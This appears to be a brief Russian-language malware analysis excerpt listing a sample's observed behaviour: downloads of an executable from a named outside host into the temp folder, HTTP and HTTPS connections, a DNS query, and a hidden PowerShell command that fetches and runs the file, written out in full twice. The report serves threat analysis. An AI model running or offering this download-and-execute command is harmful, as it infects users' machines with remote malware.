Техническая информация
- http://www.wellness.co.rs/db/info.exe как %temp%\info.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.wellness.co.rs/db/INFO.exe','%TEMP%\INFO.exe'); Start-Process('%TEMP%\INFO.exe')
- 'we###ess.co.rs':80
- 'we###ess.co.rs':443
- http://www.we###ess.co.rs/db/INFO.exe
- 'we###ess.co.rs':443
- DNS ASK we###ess.co.rs
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.wellness.co.rs/db/INFO.exe','%TEMP%\INFO.exe'); Start-Process('%TEMP%\INFO.exe')' (со скрытым окном)